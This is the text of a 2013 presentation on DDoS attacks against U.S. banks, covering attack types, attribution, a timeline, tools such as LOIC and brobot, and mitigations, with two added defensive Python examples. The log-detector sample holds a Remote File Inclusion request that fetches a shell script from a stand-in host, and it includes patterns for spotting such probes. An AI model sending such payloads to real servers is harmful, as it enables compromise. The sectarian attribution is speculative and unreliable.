Denial of Service Attacks Targeting U.S. Financial Institutions


Denial of Service Attacks Targeting U.S. Financial Institutions January 2013

Agenda What is DDoS Who’s Behind the Attacks and Why Timeline of the Attacks What Do the Attacks Look Like How are the Attacks Changing What are Banks Doing About It

Types of DoS Attacks
- ICMP flood (ping flood) and Smurf: a plain ping flood overwhelms the target with ICMP echo requests. The Smurf variant relies on misconfigured network devices that forward packets sent to a network's broadcast address to every host on that network rather than to one machine; the attacker spoofs the victim's address as the source, so every host replies to the victim and the network serves as a Smurf amplifier.
- Teardrop: older attack that sends mangled IP fragments with overlapping, over-sized payloads to the target. It crashed various older operating systems due to bugs in their TCP/IP fragment re-assembly code.
- Peer-to-peer: no botnet, and the attacker never has to communicate with the clients it subverts. Instead the attacker acts as a "puppet master," instructing clients of large peer-to-peer file-sharing hubs to disconnect from their peer-to-peer network and connect to the victim's website instead.
- Permanent denial of service (PDoS, AKA phlashing): damages a system so badly that hardware must be replaced or reinstalled. Unlike a distributed attack, a PDoS attack exploits security flaws that allow remote administration on the management interfaces of the victim's hardware, usually corrupting the firmware to render the device inoperable.
- Nuke: old attack against computer networks consisting of fragmented or otherwise invalid ICMP packets sent to the target with a modified ping utility, repeatedly, slowing the affected computer until it comes to a complete stop.
- Distributed (DDoS): multiple systems flood the bandwidth or resources of a targeted system.
- Reflective: forged requests of some type are sent to a very large number of computers that will reply to them. Using IP spoofing, the source address is set to that of the targeted victim, so all the replies go to (and flood) the target. Reflection becomes amplification when the reply is larger than the request.
- Degradation of service: compromised computers are directed to launch intermittent, short-lived floods of the victim's website to slow it down rather than crash it, which is harder to spot than a sustained flood.
- Unintentional: unforeseen outages due to unplanned events such as a power failure, hardware/software bugs, or a site's sudden enormous spike in popularity.
- Blind: if an attacker wants to receive traffic back from the victim, the attacker must either subvert the routing fabric or use their own IP address, which exposes them. In a blind attack the attacker instead uses forged source IP addresses, making it extremely difficult for the victim to filter out those packets. The TCP SYN flood is the classic example of a blind attack.
- Level 2: aims to trigger a defense mechanism that blocks the network segment from which the attack appears to originate. With spoofed sources, the defense ends up blocking legitimate networks (or the victim's own upstream) instead of the attacker.
For audience reference only. There are many types of DoS attacks. We will focus on the primary one used against U.S. Financial Institutions: DDoS.

What is a DDoS? Distributed Denial of Service (DDoS) Attack. DDoS has nothing to do with the operating system: the similar-looking acronym DOS (Disk Operating System) was made popular by Microsoft in the 80's/90's and is unrelated.

How DDoS Looks Through the Eyes of Your Technology

DDoS Threat is not Temporary... Thanks to the increasing availability of custom-coded DDoS modules within popular malware and crimeware releases, opportunistic cybercriminals are easily building managed DDoS-for-hire ("rent a botnet") services, alongside orchestrating largely under-reported DDoS extortion campaigns against financial institutions and online gambling web sites. DDoS is here to stay... Not just a threat for Financial Services. DDoS is the new high-tech protest method, similar to the "sit-in" of the 60's...

Mainstream: Rent a BotNet Anyone with a cause and a little money can rent a botnet.

The Attacks: The "Who" is Important The ancient Chinese warrior Sun Tzu taught his men to "know your enemy" before going into battle. If "you know your enemy and know yourself," he wrote, "you need not fear the result of a hundred battles." But, "If you know yourself but not the enemy, for every victory gained you will also suffer a defeat." Understand your opponent:
- Funding
- Techniques
- Capabilities
- Weapons
- Scale
- Focus/Drivers
- Why
- When have you "won"?

Who and Why? Izz ad-Din al-Qassam Cyber Fighters. Pastebin post: protest against the "Innocence of Muslims" trailer that ridiculed the Prophet Muhammad (available on MetaTube). "Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad" http://pastebin.com/yftgau9w * DO NOT GO TO THIS SITE WITHOUT ANONYMIZING YOUR CONNECTION *

Attackers Country Affiliation NOT Proven to be State sponsored at this time. Interesting statement in a recent post says “..continue to insult Muslim saints” may provide a better understanding of the source. Likely indicates Shia Muslim origin. Research indicates that the vast majority of Muslims are Sunni (85%), who vehemently reject the concept of sainthood, while the Shia accept this term. Previous posts implied all Muslims are offended and participating in these attacks. This new term indicates only a small geographic region, centered on Iran, may be offended. Previous guesses at attribution have indicated Iran with no evidence to support those claims. One could presume that the pastebin posts and the translation are under the control of the originator (as they use it as an official channel), so this is not a mistake. Shia Muslims believe that an Imam (Islamic leadership position) is sinless by nature, and that his authority is infallible as it comes directly from God. Therefore, Shia Muslims often honor the Imams as saints and perform pilgrimages to their tombs and shrines in the hopes of divine intercession. Sunni Muslims counter that there is no basis in Islam for a hereditary privileged class of spiritual leaders, and certainly no basis for the veneration or intercession of saints. Sunni Muslims contend that leadership of the community is not a birthright, but a trust that is earned and which may be given or taken away by the people themselves.

Public Reaction OMG... What are we going to do? ...Where'd they go? OMG... They're back... Who's on first... They are very disorganized... There is no real "leader" of this group; it is primarily contributors communicating over chat.

Who Has Been Targeted? May not be a comprehensive list… The news reports on the impact identified by large numbers of consumers. Financial Institutions are generally not reporting these outages. Only a few larger institutions have proactively communicated to their customers (web pages, email or social media venues).

Timeline of Attacks Targeting U.S. Financial Institutions (Americans)
- September 18, 2012: the Cyber Fighters claim responsibility for attacks on Bank of America, Citi and the NYSE, in retaliation for the "Innocence of Muslims" movie
- September 19, 2012: attack on Chase Bank
- September 27, 2012: attacks on Wells Fargo and U.S. Bank
- September 28, 2012: attack on PNC
- October 9-11, 2012: attacks on Capital One, SunTrust and Regions
- Late October, 2012: the group's attack infrastructure is taken down by U.S. law enforcement, carriers and the private sector
- November, 2012: the group acquires different infrastructure and enhances the tools used
- December 11-14, 2012: the group announces Phase 2, targeting U.S. Bancorp, JPMorgan Chase, Bank of America, PNC and SunTrust Banks
- December 19-20, 2012: attacks on BB&T, U.S. Bank and PNC
- January 3-6, 2013: the group announces attacks against JPMorgan Chase, Bank of America, Citibank, Wells Fargo, U.S. Bancorp, PNC Financial Services Group, BB&T, SunTrust and Regions
Targeting banks to hurt Americans, not the banks... Americans are seen as being highly driven by money, so they see this as the best target. They believe that by doing this, Americans will demand that their leaders remove the content from the Internet.

What Do the Attacks Look Like?
- Volumes up to 80 Gbps.
- The attacks started with HTTP and HTTPS floods targeting the institutions' public websites.
- Followed by attacks against the customer login site, which caused a significant spike in the firewall state tables (every half-open or idle connection holds a table entry until it times out).
- The next wave switched to overloading the DNS servers.
- Next the logic and database layers were attacked by performing many large full-site searches.
- If more was needed, repeated downloads of large files were used.

Impact from the Attacks
- Local Internet services around FI datacenters
- Customer impacts: nothing / slow / down
- Retail online banking
- WWW site (login page?)
- Reduced website functionality
- Mobile: not targeted (yet)
- Call center DDoS
- Alternate communication channels: social media

Wave One Attack GEO Sources

Tools They Are Using LOIC (Low Orbit Ion Cannon): open-source network stress-testing and denial-of-service attack application. LOIC was initially developed by Praetox Technologies for network load testing, but was later released into the public domain. itsoknoproblembro (AKA brobot): a general-purpose PHP script planted on compromised web servers, which then serve as the attack nodes; it lets the attacker upload and execute arbitrary Perl scripts on the compromised server. It injects an encrypted payload into the website's main index.php file, in order to bypass IPS and malware gateways, so the attacker can upload new Perl scripts at any time. Initial server infection is usually done using the well-known Remote File Inclusion (RFI) technique.

Sophistication Is Changing
Initially:
- Targets announced in advance
- Scheduled and automated
- Same attack for all FIs
- Fingerprintable: fixed User-Agent string, invalid Keep-Alive header (= 0)
Recent attacks:
- Target specific likely site weaknesses
- Unannounced
- Long lasting / no schedule
- Hashing (masking) uniquely identifiable information
- EST - 9 / 12 / 3 / 5
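The two fingerprints named on this slide (a fixed User-Agent and a Keep-Alive of 0) and the RFI infection path from the tools slide are both things a web-server access log can surface. The following is an added example, not code from the presentation or from any product; it runs a small detector over constructed log lines in the combined format with two assumed extra fields appended (the request's Connection and Keep-Alive headers), and flags sources by fingerprint, by RFI-style URL-in-parameter probes, and by request rate. The User-Agent string, the per-source threshold and the log layout are assumptions.

```python
"""Flag DDoS fingerprints and RFI probes in web-server access logs.

Added example (not from the original presentation). Log format: combined
format plus two appended fields, the Connection and Keep-Alive request
headers (an assumed site-specific log configuration). Sample lines are
constructed.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import urlparse, parse_qs

# Combined log format + "<Connection>" "<Keep-Alive>" appended (assumption).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)" '
    r'"(?P<connection>[^"]*)" "(?P<keepalive>[^"]*)"'
)

# Hypothetical User-Agent for the scripted waves; a real deployment would
# load its own fingerprint list from intelligence sharing.
SUSPECT_UAS = {"Mozilla/5.0 (compatible; brobot-example)"}
REQUESTS_PER_SOURCE_LIMIT = 50  # constructed threshold per log window

# Constructed sample: one scripted-wave source, one RFI probe, one normal user.
SAMPLE_LOG = (
    ['203.0.113.7 - - [10/Jan/2013:09:00:00 -0500] "GET /search?q=mortgage HTTP/1.1" '
     '200 512 "-" "Mozilla/5.0 (compatible; brobot-example)" "Keep-Alive" "0"'] * 60
    + ['198.51.100.4 - - [10/Jan/2013:09:00:01 -0500] '
       '"GET /index.php?page=http://evil.example/shell.txt HTTP/1.1" 404 0 "-" '
       '"Mozilla/5.0" "close" "-"']
    + ['192.0.2.9 - - [10/Jan/2013:09:00:02 -0500] "GET /login HTTP/1.1" 200 1024 "-" '
       '"Mozilla/5.0 (Windows NT 6.1)" "keep-alive" "timeout=5"']
)


def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_fingerprinted(rec):
    """Scripted-wave fingerprint: a known User-Agent, or a Keep-Alive value of 0
    (the client asks to keep the connection open but gives it zero lifetime)."""
    ka = rec["keepalive"].strip().lower()
    return rec["ua"] in SUSPECT_UAS or ka in ("0", "timeout=0")


def is_rfi_probe(rec):
    """Remote File Inclusion probe: a query parameter whose value is a URL on
    another host, the pattern used to drop scripts like brobot onto servers."""
    qs = parse_qs(urlparse(rec["path"]).query, keep_blank_values=True)
    return any(re.match(r"^(https?|ftp)://", v, re.I)
               for values in qs.values() for v in values)


def analyze(lines):
    """Map source IP -> sorted list of finding tags ('fingerprint', 'rfi', 'rate')."""
    per_ip = Counter()
    findings = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line: skip rather than crash the detector
        per_ip[rec["ip"]] += 1
        if is_fingerprinted(rec):
            findings[rec["ip"]].append("fingerprint")
        if is_rfi_probe(rec):
            findings[rec["ip"]].append("rfi")
    for ip, n in per_ip.items():
        if n > REQUESTS_PER_SOURCE_LIMIT:
            findings[ip].append("rate")
    return {ip: sorted(set(tags)) for ip, tags in findings.items()}


if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE_LOG).items():
        print(ip, ",".join(tags))
```

The rate check is per source, which is exactly what the later, unannounced waves defeat by masking identifying information and spreading load across more compromised servers; the fingerprint and RFI checks still work per request, which is why they are worth keeping even when volume-based rules stop firing.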

What Are Banks Doing About It?
Acquire / refine current mitigation:
- Cloud service providers: DDoS mitigation (blackholing), DNS outsourcing, content delivery networks (CDNs)
- Premise technology: firewalls and intrusion prevention systems to block bad traffic
- Turn off/down non-mission-critical services (search, file downloading, etc.)
- Add more capacity (Internet, servers, network)
- Mitigation testing
- Incident management: exercising communication plans
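"Turn off/down non-mission-critical services" is the cheapest mitigation on this list, and it directly answers the full-site-search and large-file-download stages described earlier. The following is an added example, not from the presentation or any vendor product: a front-end load shedder that watches the aggregate request rate over a sliding window and degrades in steps, shedding expensive endpoints first, then serving static cached pages for everything except login and account functions. The route prefixes, window length and thresholds are assumptions; a real deployment would take them from capacity testing.

```python
"""Priority-based load shedding for a banking web front end.

Added example (not from the presentation). Models the advice to throttle
non-mission-critical functions under attack so login and account pages stay
up. Route prefixes and thresholds are assumptions.
"""
import time
from collections import deque

# Assumed route classes: critical must keep working; expensive are the
# search / large-download paths the attack waves leaned on.
CRITICAL_PREFIXES = ("/login", "/account", "/api/auth")
EXPENSIVE_PREFIXES = ("/search", "/download", "/statements/pdf")


class LoadShedder:
    """Decide per request whether to serve it, serve a cached static page, or shed it."""

    def __init__(self, window_s=10.0, normal_rps=100.0, attack_rps=1000.0,
                 clock=time.monotonic):
        self.window_s = window_s      # sliding window for the rate estimate
        self.normal_rps = normal_rps  # above this: shed expensive endpoints
        self.attack_rps = attack_rps  # above this: static pages for non-critical routes
        self.clock = clock
        self.arrivals = deque()       # request timestamps inside the window

    def _rps(self, now):
        """Evict timestamps older than the window, return requests per second."""
        while self.arrivals and now - self.arrivals[0] > self.window_s:
            self.arrivals.popleft()
        return len(self.arrivals) / self.window_s

    def decide(self, path, now=None):
        """Return 'serve', 'static' or 'shed' for a request to `path`."""
        now = self.clock() if now is None else now
        self.arrivals.append(now)
        rps = self._rps(now)
        route = path.split("?", 1)[0]  # ignore the query string when classifying
        if rps <= self.normal_rps:
            return "serve"
        if route.startswith(EXPENSIVE_PREFIXES):
            return "shed"  # first step: stop full-site search and big downloads
        if rps > self.attack_rps and not route.startswith(CRITICAL_PREFIXES):
            return "static"  # second step: cached page, no backend hit
        return "serve"


def http_response(decision):
    """Map a decision to (status, headers) the front end would emit."""
    if decision == "shed":
        return 503, {"Retry-After": "30"}
    if decision == "static":
        return 200, {"X-Served-From": "static-cache"}
    return 200, {}


if __name__ == "__main__":
    s = LoadShedder()
    for _ in range(1200):                 # constructed burst inside one window
        s.decide("/", now=1.0)
    for p in ("/search?q=x", "/news", "/login"):
        print(p, s.decide(p, now=1.0))
```

The order of the steps matters: the search and download paths are the ones whose cost per request is highest (database and logic tiers, large transfers), so shedding them buys the most headroom per blocked request, and it is done before touching anything a customer needs to get into their account.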

Final Thought: Remember it's Mitigation, NOT Elimination. The goal is to stay afloat while under attack. Current U.S. law prohibits "hacking back": using offensive force against the attacker's systems, even while you are being attacked via a cyber channel.